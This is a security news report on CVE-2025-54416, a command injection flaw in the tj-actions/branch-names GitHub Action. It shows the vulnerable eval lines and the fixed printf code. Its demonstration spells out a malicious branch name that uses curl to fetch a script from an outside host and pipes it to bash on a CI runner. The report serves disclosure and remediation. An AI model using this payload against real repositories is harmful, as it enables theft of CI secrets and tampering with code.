Critical Command Injection (CVE-2025-54416) in tj-actions/branch-names GitHub Action Exposes 5,000+ Repos

A critical command injection vulnerability has been disclosed in the widely used GitHub Action tj-actions/branch-names, affecting over 5,000 public repositories. Assigned CVE-2025-54416 with a CVSS score of 9.1, the flaw allows arbitrary command execution in downstream workflows, placing countless automation pipelines at risk.

The branch-names GitHub Action is a workflow utility that retrieves branch and tag names during CI/CD operations. It’s often used to trigger tests, linting, or deployment workflows based on changed files or contextual information. However, its popularity has made it an attractive target for threat actors.

The vulnerability stems from the misuse of shell commands within the action’s code. While printf “%q” was initially used to escape input, developers later unescaped the data using eval printf “%s”—reintroducing the exact injection risks they attempted to prevent.

echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"
echo "head_ref_branch=$(eval printf "%s" "$HEAD_REF")" >> "$GITHUB_OUTPUT"
echo "ref_branch=$(eval printf "%s" "$REF_BRANCH")" >> "$GITHUB_OUTPUT"

By using eval, any specially crafted branch name or tag can trigger command execution during CI workflows.

A demonstration of the flaw is presented in the advisory. An attacker could simply create a branch named:

$(curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)

Once a pull request is opened using this branch, the vulnerable action executes the embedded payload. This shows how attackers can execute remote scripts on GitHub-hosted runners, potentially stealing secrets or modifying source code.

Depending on repository configuration, an attacker exploiting this vulnerability could:

• Exfiltrate sensitive repository secrets
• Gain unauthorized write access
• Inject malicious code into releases or deployment pipelines
• Compromise CI/CD pipeline integrity

“The severity of the impact depends on the permissions granted to the GITHUB_TOKEN and the context of the triggering event,” the advisory explains.

This is particularly concerning in environments where pull requests automatically trigger privileged workflows.

To mitigate the issue, the action has now removed the use of eval entirely. Instead, output is written using safe and direct printf calls, which do not allow command injection:

printf "base_ref_branch=%s\n" "$BASE_REF" >> "$GITHUB_OUTPUT"
printf "head_ref_branch=%s\n" "$HEAD_REF" >> "$GITHUB_OUTPUT"
printf "ref_branch=%s\n" "$REF_BRANCH" >> "$GITHUB_OUTPUT"
printf "tag=%s\n" "$TAG" >> "$GITHUB_OUTPUT"

This preserves shell safety while achieving the same functionality.

Developers using the tj-actions/branch-names workflow should update their workflows to latest major version v9.

Related Posts:

• Microsoft April Patch Tuesday includes mitigate Spectre Variant 2 for AMD processors
• Exploiting Misconfigurations in Argo Workflows for Kubernetes Cluster Takeover
• GitHub Security Alerts has detected over 4 million vulnerabilities
• Google Workspace Introduces Workspace Flows and AI Enhancements

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy